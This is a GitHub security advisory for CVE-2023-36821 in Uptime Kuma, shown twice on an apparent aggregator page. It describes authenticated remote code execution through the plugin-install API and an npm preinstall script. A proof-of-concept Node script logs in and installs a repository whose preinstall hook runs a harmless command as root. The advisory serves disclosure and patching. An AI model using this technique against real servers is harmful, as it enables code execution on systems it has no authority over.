Headline

GHSA-7grx-f945-mj96: Uptime Kuma vulnerable to authenticated remote code execution via malicious plugin installation

Summary

Installation of a maliciously crafted plugin allows for remote code execution by an authenticated attacker.

Details

Uptime Kuma allows authenticated users to install plugins from an official list of plugins. This feature is currently disabled in the web interface, but the corresponding API endpoints are still available after login. After downloading a plugin, it’s installed by calling npm install in the installation directory of the plugin: https://github.com/louislam/uptime-kuma/blob/8c60e902e1c76ecbbd1b0423b07ce615341cb850/server/plugins-manager.js#L210-L216

Because the plugin is not validated against the official list of plugins or installed with npm install --ignore-scripts, a maliciously crafted plugin taking advantage of npm scripts can gain remote code execution.

PoC

In the PoC below, the plugin at https://github.com/n-thumann/npm-install-script-poc will be installed. It only consists of an empty index.js and a package.json containing the script: "preinstall": "echo \"Malicious code could have been executed as user $(whoami)\" > /tmp/poc". This will be executed when installing the plugin.

Start Uptime Kuma: docker run -d -p 3001:3001 -v uptime-kuma:/app/data --name uptime-kuma louislam/uptime-kuma:1
Create a user using the Uptime Kuma web interface, e.g. user admin with password admin123
Confirm that the PoC file to be created doesn’t exist yet:

➜  ~ docker exec -it uptime-kuma cat /tmp/poc
cat: /tmp/poc: No such file or directory

Create file poc.js with the following content:

SERVER = "ws://localhost:3001";
USERNAME = "admin";
PASSWORD = "admin123";


const { io } = require("socket.io-client");
const socket = io(SERVER);
const repo = "https://github.com/n-thumann/npm-install-script-poc";
const name = "npm-install-script-poc";

socket.emit(
  "login",
  { username: USERNAME, password: PASSWORD, token: "" },
  (res) => {
    if (res.ok !== true) return console.log("Login failed");

    console.log("Login successful");
    socket.emit("installPlugin", repo, name, () => {
      console.log("Done");
      socket.close();
    });
  }
);

Install socket.io-client: npm install socket.io-client
Run the script: node poc.js:

# node poc.js
Login successful
Done

The PoC file has been created:

➜  ~ docker exec -it uptime-kuma cat /tmp/poc
Malicious code could have been executed as user root

Impact

This vulnerability allows authenticated attacker to gain remote code execution on the server Uptime Kuma is running on.

6 months ago

ghsa

Open in Source

#vulnerability #web #nodejs #js #git #rce #auth #docker

Summary

Installation of a maliciously crafted plugin allows for remote code execution by an authenticated attacker.

Details

Uptime Kuma allows authenticated users to install plugins from an official list of plugins. This feature is currently disabled in the web interface, but the corresponding API endpoints are still available after login.
After downloading a plugin, it’s installed by calling npm install in the installation directory of the plugin:
https://github.com/louislam/uptime-kuma/blob/8c60e902e1c76ecbbd1b0423b07ce615341cb850/server/plugins-manager.js#L210-L216

Because the plugin is not validated against the official list of plugins or installed with npm install --ignore-scripts, a maliciously crafted plugin taking advantage of npm scripts can gain remote code execution.

PoC

In the PoC below, the plugin at https://github.com/n-thumann/npm-install-script-poc will be installed. It only consists of an empty index.js and a package.json containing the script: "preinstall": "echo "Malicious code could have been executed as user $(whoami)" > /tmp/poc". This will be executed when installing the plugin.

Start Uptime Kuma: docker run -d -p 3001:3001 -v uptime-kuma:/app/data --name uptime-kuma louislam/uptime-kuma:1
Create a user using the Uptime Kuma web interface, e.g. user admin with password admin123
Confirm that the PoC file to be created doesn’t exist yet:

➜ ~ docker exec -it uptime-kuma cat /tmp/poc cat: /tmp/poc: No such file or directory

Create file poc.js with the following content:

SERVER = "ws://localhost:3001"; USERNAME = "admin"; PASSWORD = "admin123";

const { io } = require("socket.io-client");
const socket = io(SERVER);
const repo = "https://github.com/n-thumann/npm-install-script-poc";
const name = "npm-install-script-poc";

socket.emit(
  "login",
  { username: USERNAME, password: PASSWORD, token: "" },
  (res) => {
    if (res.ok !== true) return console.log("Login failed");

    console.log("Login successful");
    socket.emit("installPlugin", repo, name, () => {
      console.log("Done");
      socket.close();
    });
  }
);

Install socket.io-client: npm install socket.io-client
Run the script: node poc.js:

node poc.js

Login successful Done

The PoC file has been created:

➜ ~ docker exec -it uptime-kuma cat /tmp/poc Malicious code could have been executed as user root

Impact

This vulnerability allows authenticated attacker to gain remote code execution on the server Uptime Kuma is running on.

References

GHSA-7grx-f945-mj96
https://nvd.nist.gov/vuln/detail/CVE-2023-36821
louislam/uptime-kuma#3346
louislam/uptime-kuma@a0736e0
https://github.com/louislam/uptime-kuma/blob/8c60e902e1c76ecbbd1b0423b07ce615341cb850/server/plugins-manager.js#L210-L216
https://github.com/louislam/uptime-kuma/releases/tag/1.22.1

ghsa: Latest News

GHSA-gppm-hq3p-h4rp: Git credentials are exposed in Atlantis logs

6 hours ago

ghsa

GHSA-gr3c-q7xf-47vh: XXE vulnerability in XSLT parsing in `org.hl7.fhir.core`

6 hours ago

ghsa

GHSA-8m24-3cfx-9fjw: sp1 has insufficient observation of cumulative sum

8 hours ago

ghsa

GHSA-j857-2pwm-jjmm: Apache Airflow vulnerable to Insertion of Sensitive Information Into Sent Data

10 hours ago

ghsa

GHSA-6jrf-rcjf-245r: changedetection.io path traversal using file URI scheme without supplying hostname

1 day ago

ghsa